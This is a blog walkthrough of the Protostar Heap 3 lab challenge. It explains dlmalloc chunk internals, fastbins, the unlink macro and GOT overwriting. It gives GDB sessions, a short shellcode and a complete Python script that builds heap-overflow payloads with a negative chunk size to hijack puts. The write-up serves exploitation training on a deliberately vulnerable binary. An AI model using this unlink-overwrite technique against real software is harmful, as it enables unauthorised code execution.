Protostar Heap 3 Walkthrough

Airman
12 min readApr 19, 2018

Having previously tackled the last stack challenge in Protostar from Exploit Exercises (https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0), we’re now switching to the last heap challenge (https://exploit-exercises.com/protostar/heap3/).

Heap 3 Challenge

Here’s the source code for the Protostar Heap 3 challenge:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
void winner()
{
printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
char *a, *b, *c;
a = malloc(32);
b = malloc(32);
c = malloc(32);
strcpy(a, argv[1]);
strcpy(b, argv[2]);
strcpy(c, argv[3]);
free(c);
free(b);
free(a);
printf("dynamite failed?\n");
}

The goal is to call the winnder() function. As strcpy is used, it is possible to overflow all three of the dynamically allocated buffers, so let’s see what we can do with that.

Heap

Heap is used in C programs for dynamic memory management. libc provides an easy to use interface (malloc/ free) to allocate and de-allocate memory regions. The version of libc in Protostar uses an implementation of malloc called dlmalloc, after the name of it’s original creator, Doug Lea. The control structures used by malloc are stored in-band with the data, which allows manipulation of the control structures when heap buffer overflow is possible, as above.

malloc allocates memory in chunks that have the following structure:

prev_size stores the size of the previous chunk, size stores the size of the current chunk. Chunk size will always be a multiple of 8 bytes for alignment, which means that the 3 lowest bits of the size will always be 0. malloc uses these three bits, most notably the least significant bit will indicate whether the previous chunk is in use or free. So, if we see 0x29 in the size field, the size of the current chunk is 40 (hex 0x28), and the previous chunk is in use. When malloc is called, it initializes prev_size and size and returns the address of the memory right after (mem in the picture above). Fields depicted as fd and bk are ignored for used chunks and the memory is used for the program data.

When a chunk is free (i.e. after free was called to de-allocate the chunk) it is stored in a double-linked list structure, and the fd field contains the address of the next free chunk (forward pointer), and bk field contains the address of the previous free chunk (backward pointer). Thus these pointers overwrite the beginning of the data in an unused chunk.

This is how malloc_chunk is defined in malloc.c (simplified):

struct malloc_chunk {  INTERNAL_SIZE_T      prev_size;
INTERNAL_SIZE_T size;

struct malloc_chunk* fd;
struct malloc_chunk* bk;
};

Now let’s run the program in debugger and see how it all works:

user@protostar:/opt/protostar/bin$ gdb heap3
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/heap3...done.
(gdb) set disassembly-flavor intel
(gdb) set pagination off
(gdb) disas main
Dump of assembler code for function main:
0x08048889 <main+0>: push ebp
0x0804888a <main+1>: mov ebp,esp
0x0804888c <main+3>: and esp,0xfffffff0
0x0804888f <main+6>: sub esp,0x20
0x08048892 <main+9>: mov DWORD PTR [esp],0x20
0x08048899 <main+16>: call 0x8048ff2 <malloc>
0x0804889e <main+21>: mov DWORD PTR [esp+0x14],eax
0x080488a2 <main+25>: mov DWORD PTR [esp],0x20
0x080488a9 <main+32>: call 0x8048ff2 <malloc>
0x080488ae <main+37>: mov DWORD PTR [esp+0x18],eax
0x080488b2 <main+41>: mov DWORD PTR [esp],0x20
0x080488b9 <main+48>: call 0x8048ff2 <malloc>
0x080488be <main+53>: mov DWORD PTR [esp+0x1c],eax
0x080488c2 <main+57>: mov eax,DWORD PTR [ebp+0xc]
0x080488c5 <main+60>: add eax,0x4
0x080488c8 <main+63>: mov eax,DWORD PTR [eax]
0x080488ca <main+65>: mov DWORD PTR [esp+0x4],eax
0x080488ce <main+69>: mov eax,DWORD PTR [esp+0x14]
0x080488d2 <main+73>: mov DWORD PTR [esp],eax
0x080488d5 <main+76>: call 0x8048750 <strcpy@plt>
0x080488da <main+81>: mov eax,DWORD PTR [ebp+0xc]
0x080488dd <main+84>: add eax,0x8
0x080488e0 <main+87>: mov eax,DWORD PTR [eax]
0x080488e2 <main+89>: mov DWORD PTR [esp+0x4],eax
0x080488e6 <main+93>: mov eax,DWORD PTR [esp+0x18]
0x080488ea <main+97>: mov DWORD PTR [esp],eax
0x080488ed <main+100>: call 0x8048750 <strcpy@plt>
0x080488f2 <main+105>: mov eax,DWORD PTR [ebp+0xc]
0x080488f5 <main+108>: add eax,0xc
0x080488f8 <main+111>: mov eax,DWORD PTR [eax]
0x080488fa <main+113>: mov DWORD PTR [esp+0x4],eax
0x080488fe <main+117>: mov eax,DWORD PTR [esp+0x1c]
0x08048902 <main+121>: mov DWORD PTR [esp],eax
0x08048905 <main+124>: call 0x8048750 <strcpy@plt>
0x0804890a <main+129>: mov eax,DWORD PTR [esp+0x1c]
0x0804890e <main+133>: mov DWORD PTR [esp],eax
0x08048911 <main+136>: call 0x8049824 <free>
0x08048916 <main+141>: mov eax,DWORD PTR [esp+0x18]
0x0804891a <main+145>: mov DWORD PTR [esp],eax
0x0804891d <main+148>: call 0x8049824 <free>
0x08048922 <main+153>: mov eax,DWORD PTR [esp+0x14]
0x08048926 <main+157>: mov DWORD PTR [esp],eax
0x08048929 <main+160>: call 0x8049824 <free>
0x0804892e <main+165>: mov DWORD PTR [esp],0x804ac27
0x08048935 <main+172>: call 0x8048790 <puts@plt>
0x0804893a <main+177>: leave
0x0804893b <main+178>: ret
End of assembler dump.
(gdb) break *0x080488be
Breakpoint 1 at 0x80488be: file heap3/heap3.c, line 18.
(gdb) break *0x0804890a
Breakpoint 2 at 0x804890a: file heap3/heap3.c, line 24.
(gdb) break *0x0804892e
Breakpoint 3 at 0x804892e: file heap3/heap3.c, line 28.

We load the program into GDB and set breakpoints after all of the malloc calls, after all of the strcpy calls, and after all of the free calls. Let’s run it:

(gdb) run AAAAAAAA BBBBBBBB CCCCCCCC
Starting program: /opt/protostar/bin/heap3 AAAAAAAA BBBBBBBB CCCCCCCC
Breakpoint 1, 0x080488be in main (argc=4, argv=0xbffff854) at heap3/heap3.c:18
18 heap3/heap3.c: No such file or directory.
in heap3/heap3.c
(gdb) info proc map
process 2482
cmdline = '/opt/protostar/bin/heap3'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap3'
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x804b000 0x3000 0 /opt/protostar/bin/heap3
0x804b000 0x804c000 0x1000 0x3000 /opt/protostar/bin/heap3
0x804c000 0x804d000 0x1000 0 [heap]
0xb7e96000 0xb7e97000 0x1000 0
0xb7e97000 0xb7fd5000 0x13e000 0 /lib/libc-2.11.2.so
0xb7fd5000 0xb7fd6000 0x1000 0x13e000 /lib/libc-2.11.2.so
0xb7fd6000 0xb7fd8000 0x2000 0x13e000 /lib/libc-2.11.2.so
0xb7fd8000 0xb7fd9000 0x1000 0x140000 /lib/libc-2.11.2.so
0xb7fd9000 0xb7fdc000 0x3000 0
0xb7fe0000 0xb7fe2000 0x2000 0
0xb7fe2000 0xb7fe3000 0x1000 0 [vdso]
0xb7fe3000 0xb7ffe000 0x1b000 0 /lib/ld-2.11.2.so
0xb7ffe000 0xb7fff000 0x1000 0x1a000 /lib/ld-2.11.2.so
0xb7fff000 0xb8000000 0x1000 0x1b000 /lib/ld-2.11.2.so
0xbffeb000 0xc0000000 0x15000 0 [stack]
(gdb) x/40x 0x804c000
0x804c000: 0x00000000 0x00000029 0x00000000 0x00000000
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
0x804c030: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c040: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c050: 0x00000000 0x00000029 0x00000000 0x00000000
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
0x804c080: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c090: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/i $eip
>x/40x 0x804c000
>end

After malloc we inspect program’s memory layout to find the location of the heap (0x0804c000) and configure GDB to print current CPU instruction and 40 32-bit values from the top of the heap every time a breakpoint is reached.

The highlighted portion of the heap is the first allocated chunk. We can see that prev_size is 0, size is 0x29 (40 bytes, and the least significant bit is set to 1 to indicate that the previous chunk is in use), and then 32 bytes of the allocated memory.

Let’s continue:

(gdb) c
Continuing.
0x804890a <main+129>: mov eax,DWORD PTR [esp+0x1c]
0x804c000: 0x00000000 0x00000029 0x41414141 0x41414141
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
0x804c030: 0x42424242 0x42424242 0x00000000 0x00000000
0x804c040: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c050: 0x00000000 0x00000029 0x43434343 0x43434343
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
0x804c080: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c090: 0x00000000 0x00000000 0x00000000 0x00000000
Breakpoint 2, main (argc=4, argv=0xbffff854) at heap3/heap3.c:24
24 in heap3/heap3.c

We see that strcpy copied the data into the allocated memory (‘A’ is ASCII 0x41, ‘B’ is 0x42, ‘C’ is 0x43).

(gdb) c
Continuing.
0x804892e <main+165>: mov DWORD PTR [esp],0x804ac27
0x804c000: 0x00000000 0x00000029 0x0804c028 0x41414141
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
0x804c030: 0x0804c050 0x42424242 0x00000000 0x00000000
0x804c040: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c050: 0x00000000 0x00000029 0x00000000 0x43434343
0x804c060: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
0x804c080: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c090: 0x00000000 0x00000000 0x00000000 0x00000000
Breakpoint 3, main (argc=4, argv=0xbffff854) at heap3/heap3.c:28
28 in heap3/heap3.c
(gdb) c
Continuing.
dynamite failed?
Program exited with code 021.
Error while running hook_stop:
No registers.

And now we see something unexpected. Firstly, prev_size is still 0 in all the chunks, but it should contain the size of the previous block. Secondly, while the fd correctly points to the next free block (0x0804c028 for the first chunk, which is the address of the second chunk), bk doesn’t seem to be set. Also, the least significant bit of the size field have not been set to indicate the previous chunk is free. What is going on?

Enter Fastbins

The reason this is not working the way we expected is due to the fact that the allocated buffers are small. When a chunk is smaller than 64 bytes (by default), malloc will use a simplified data structure (fastbin) and will ignore prev_size, bk, and the “previous chunk in use” bit.

So why did we talk about all these fields if all the chunks are small? For our exploit code we will need the chunks to be treated as regular chunks by malloc, not as fastbin chunks.

Free

When free is called on a chunk, if there are free chunks adjacent to the chunk being freed (i.e. right before or right after), free will consolidate them into a larger free chunk. Free chunks are stored in a double-linked list (ignoring fastbin chunks for now), and when doing the consolidation free will remove the adjacent free chunk that is being consolidated from the list as it will become a part of a new, larger, chunk. Here’s what happens conceptually (there’s much more code and edge cases, like checking if the current chunk is the last one in the heap):

if( next adjacent chunk is free ){
unlink next adjacent chunk;
increase the size of the current chunk to include next adjacent chunk;
}
if( previous adjacent chunk is free ){
unlink previous adjacent chunk;
increase the size of the previous adjacent chunk to include the current chunk;
}

The unlink part is done through unlink macro, here’s a simplified version:

#define unlink(P, BK, FD) { \
FD = P->fd; \
BK = P->bk; \
FD->bk = BK; \
BK->fd = FD; \
}

This is called with the chunk to be unlinked as the first argument P, and temporary variables to store pointers to previous and next free chunks as arguments BK and FD. When a chunk is unlinked it makes the next free chunk P->fd and the previous free chunk P->bk point at each other. Here’s a visual:

So unlink basically writes the value of P->bk to the memory at address (P->fd)+12 and the value of P->fd to the memory at address (P->bk)+8. The changed memory is highlighted in blue. If we can control the values of P->fd and P->bk we can overwrite arbitrary memory, with the restriction being that both (P->fd)+12 and (P->bk)+8 have to be writeable.

Global Offset Table

Have a look at the disassembly of main() again. The source code calls printf at the end of main(), but as part of optimizations compiler determines that the string is constant and replaces it with a call to puts at address 0x08048790. Let’s see what it does:

(gdb) x/3i 0x8048790
0x8048790 <puts@plt>: jmp DWORD PTR ds:0x804b128
0x8048796 <puts@plt+6>: push 0x68
0x804879b <puts@plt+11>: jmp 0x80486b0
(gdb) x/x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x08048796

puts is not called directly, but rather through PLT (Procedure Linkage Table) that jumps to the puts address contained in GOT (Global Offset Table). This is part of dynamic library linking, here’s a video explanation from LiveOverflow: https://www.youtube.com/watch?v=kUk5pw4w0h4

We can use the Global Offset Table to redirect the execution flow if we overwrite the address at 0x0804b128.

Our plan is clear now. We’ll store shellcode that will call winner() somewhere on the heap, we will then force the chunk consolidation and the call to unlink on a specially crafted chunk. The chunk will contain 0x0804b11c = (0x0804b128-12) in fd field and the address of the shellcode in the bk field. We cannot write the address of winner() to the bk as that part of memory is not writeable and BK->fd will also be updated as part of unlink.

Negative Chunk Size

We need one more little trick explained in the Phrack article linked below — what if we have -4 (0xfffffffc) as the chunk size?

  • When determining whether to use fastbin, malloc is casting the chunk size to unsigned int, so -4 is bigger than 64.
  • The least significant bit of 0xfffffffc is not set, which indicates the previous adjacent chunk is free and unlink will be called for it!
  • The address of the previous adjacent chunk will be calculated by subtracting -4 (i.e. adding 4) from the current chunk’s beginning.
  • The address of the next adjacent chunk will be calculated by adding -4 (i.e. subtracting 4) from the current chunk’s beginning. Its size will also be -4.
  • The value right before the start of the current chunk will be used to determine whether the next adjacent chunk is free. This should be set to an odd number to avoid memory corruption (otherwise unlink will be called for the next adjacent chunk also as part of free chunk consolidation).

If we can get free called on this specially crafted chunk, it will cause the value of puts@GOT to be replaced with the address of our shellcode. Note, the shellcode should either be super short (8 bytes or less), or jump 12 bytes ahead as the memory at “addr of shellcode”+8 will be overwritten by unlink.

Using negative size also takes care of the NULL/0x00 bytes, which we cannot put arbitrarily into our buffers as they will be treated as string terminators.

Shellcode

We just need to call winner():

(gdb) p winner
$2 = {void (void)} 0x8048864 <winner>

This assembler snippet should do it:

push 0x08048864
ret

I used http://shell-storm.org/online/Online-Assembler-and-Disassembler/ to turn these instructions into "\x68\x64\x88\x04\x08\xc3", which fits into the 8 bytes we have available.

The Exploit

We’ll use the third buffer for our crafted chunk. We’ll store the shellcode in the middle of the second buffer, and also will use it to overwrite prev_size and size of the last block with 0xfffffffc.

#!/usr/bin/python# usage:
# run this script, then start heap3 as:
# ./heap3 $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
# the script will write /tmp/[A,B,C] payloads
import struct# first argument
buf1 = ''
buf1 += 'AAAA' # unused
# second argument
buf2 = ''
buf2 += '\xff'*16
buf2 += "\x68\x64\x88\x04\x08\xc3" # shellcode
buf2 += '\xff'*(32-len(buf2))
# overwrite prev_size and size of the last chunk with -4
buf2 += struct.pack('I', 0xfffffffc)*2
# third argument
buf3 = ''
buf3 += '\xff'*4 # junk
buf3 += struct.pack('I', 0x804b128-12) # puts@GOT-12
buf3 += struct.pack('I', 0x804c040) # address of the shellcode
files = ["/tmp/A", "/tmp/B", "/tmp/C"]
buffers = [buf1, buf2, buf3]
for f_name, buf in zip(files, buffers):
with open(f_name, 'wb') as f:
f.write(buf)

The exploit saves these buffers in files as /tmp/[A,B,C], so heap3 should be called as:

user@protostar:/opt/protostar/bin$ ./heap3 $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
that wasn't too bad now, was it? @ 1523764777

It works! Let’s check it in GDB. We’ll set breakpoints at the first call to free and at the call to puts:

(gdb) del
Delete all breakpoints? (y or n) y
(gdb) break *0x08048911
Breakpoint 6 at 0x8048911: file heap3/heap3.c, line 24.
(gdb) break *0x08048935
Breakpoint 7 at 0x8048935: file heap3/heap3.c, line 28.
(gdb) run $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
Starting program: /opt/protostar/bin/heap3 $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
0x8048911 <main+136>: call 0x8049824 <free>
0x804c000: 0x00000000 0x00000029 0x41414141 0x00000000
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
0x804c030: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
0x804c040: 0x04886468 0xffffc308 0xffffffff 0xffffffff
0x804c050: 0xfffffffc 0xfffffffc 0xffffffff 0x0804b11c
0x804c060: 0x0804c040 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
0x804c080: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c090: 0x00000000 0x00000000 0x00000000 0x00000000
Breakpoint 6, 0x08048911 in main (argc=4, argv=0xbffff834) at heap3/heap3.c:24
24 in heap3/heap3.c

I’ve highlighted the shellcode at address 0x0804c040 and our fake chunk at address 0x0804c050. Let’s continue:

(gdb) c
Continuing.
0x8048935 <main+172>: call 0x8048790 <puts@plt>
0x804c000: 0x00000000 0x00000029 0x0804c028 0x00000000
0x804c010: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c020: 0x00000000 0x00000000 0x00000000 0x00000029
0x804c030: 0x00000000 0xffffffff 0xffffffff 0xffffffff
0x804c040: 0x04886468 0xffffc308 0x0804b11c 0xfffffff8
0x804c050: 0xfffffffc 0xfffffffc 0xfffffff9 0x0804b194
0x804c060: 0x0804b194 0x00000000 0x00000000 0x00000000
0x804c070: 0x00000000 0x00000000 0x00000000 0x00000f89
0x804c080: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c090: 0x00000000 0x00000000 0x00000000 0x00000000
Breakpoint 7, 0x08048935 in main (argc=4, argv=0xbffff834) at heap3/heap3.c:28
28 in heap3/heap3.c
(gdb) x/x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c040
(gdb) c
Continuing.
that wasn't too bad now, was it? @ 1523773687
Program exited with code 056.
Error while running hook_stop:
No registers.

We check that we have correctly updated the puts address in GOT to point to the shellcode. I’ve also highlighted the address after the shellcode that was overwritten by unlink.

Final Thought

It took me a while to figure out how heap exploits work, it seemed like dark magic in the beginning. Also, fastbin stuff was very confusing. I hope this walkthrough helped.

References

Phrack issue #57, Once upon a free() by anonymous — http://phrack.org/issues/57/9.html

LiveOverflow Binary Hacking course — https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN

Protostar Heap 3 Walkthrough from Joshua Wang: https://conceptofproof.wordpress.com/2013/11/19/protostar-heap3-walkthrough/

--

--

Airman

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.